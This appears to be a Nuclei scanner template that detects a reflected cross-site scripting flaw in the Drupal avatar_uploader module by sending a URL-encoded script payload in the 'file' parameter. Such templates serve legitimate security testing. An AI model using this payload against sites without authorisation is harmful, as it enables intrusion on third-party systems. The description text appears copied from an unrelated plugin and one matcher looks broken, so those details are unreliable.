id: drupal-avatar-xss info: name: Drupal avatar_uploader v7.x-1.0-beta8 - Cross-Site Scripting author: bywalks severity: medium description: | This plugin creates a avatar_uploader from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting. reference: - https://www.exploit-db.com/exploits/50841 tags: xss,drupal,edb requests: - method: GET path: - "{{BaseURL}}/avatar_uploader.pages.inc?file=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E" matchers-condition: and matchers: - type: word part: body words: - "
" - type: word part: header words: - "text/html" - type: status status: - 200